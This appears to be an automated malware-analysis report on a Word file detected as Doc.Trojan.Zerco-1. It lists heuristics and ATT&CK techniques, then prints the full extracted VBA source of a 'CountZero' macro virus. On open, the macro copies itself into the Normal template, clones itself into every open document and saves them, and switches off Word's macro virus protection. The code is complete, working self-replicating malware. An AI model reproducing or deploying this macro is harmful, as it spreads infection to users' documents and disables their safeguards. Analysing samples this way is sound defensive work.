Verdict: MALICIOUS
Risk Score: 200
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Zerco-1. It contains a legacy WordBasic AutoOpen macro and other VBA macros, indicating an attempt to execute arbitrary code upon opening. The AutoOpen macro appears to be designed to copy itself to the Normal template, potentially for persistence or to ensure execution on subsequent document openings.
Heuristics (4)
- ClamAV: Doc.Trojan.Zerco-1 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Zerco-1
- VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3554 bytes |

SHA-256: 698bda84207d106fbfb8028251907bc3a2ba15d227695fab002440ae1535759a
Detection: ClamAV: Doc.Trojan.Zerco-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CountZero"
Sub AutoOpen()
Dim vbc As VBComponent
Dim cm As CodeModule
Dim vir As CodeModule
Dim cdoc As Document
Dim vbiref As Reference
On Error Resume Next
If ThisDocument.Name <> NormalTemplate.Name Then
Set vbc = NormalTemplate.VBProject.VBComponents("CountZero")
If Err <> 0 Then
For Each vbiref In ThisDocument.VBProject.References
If vbiref.Name = "VBIDE" Then
Exit For
End If
Next
Set vbc = NormalTemplate.VBProject.VBComponents.Add(vbext_ct_StdModule)
vbc.Name = "CountZero"
Set cm = vbc.CodeModule
Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
NormalTemplate.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
Else
Set cm = vbc.CodeModule
Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
If cm.Lines(1, cm.CountOfLines) <> vir.Lines(1, vir.CountOfLines) Then
For Each vbiref In ThisDocument.VBProject.References
If vbiref.Name = "VBIDE" Then
Exit For
End If
Next
Set vbc = NormalTemplate.VBProject.VBComponents.Add(vbext_ct_StdModule)
vbc.Name = "CountZero"
Set cm = vbc.CodeModule
Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
NormalTemplate.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
End If
End If
End If
For Each cdoc In Documents
Clone cdoc
cdoc.Save
Next
Options.VirusProtection = False
Application.Activate
On Error GoTo 0
End Sub
Sub Clone(ByRef dest As Document)
Dim vbiref As Reference
Dim vbc As VBComponent
Dim cm As CodeModule
Dim vir As CodeModule
On Error Resume Next
For Each vbiref In ThisDocument.VBProject.References
If vbiref.Name = "VBIDE" Then
Exit For
End If
Next
Set vbc = dest.VBProject.VBComponents("CountZero")
If Err <> 0 Then
Set vbc = dest.VBProject.VBComponents.Add(vbext_ct_StdModule)
vbc.Name = "CountZero"
Set cm = vbc.CodeModule
Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
dest.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
Else
Set cm = vbc.CodeModule
Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
If cm.Lines(1, cm.CountOfLines) <> vir.Lines(1, vir.CountOfLines) Then
Set vbc = dest.VBProject.VBComponents.Add(vbext_ct_StdModule)
vbc.Name = "CountZero"
Set cm = vbc.CodeModule
Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
dest.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
End If
End If
End Sub
Sub AutoNew()
Dim adoc As Document
If ThisDocument.Name = NormalTemplate.Name Then
For Each adoc In Documents
Clone adoc
Next
Application.Activate
End If
End Sub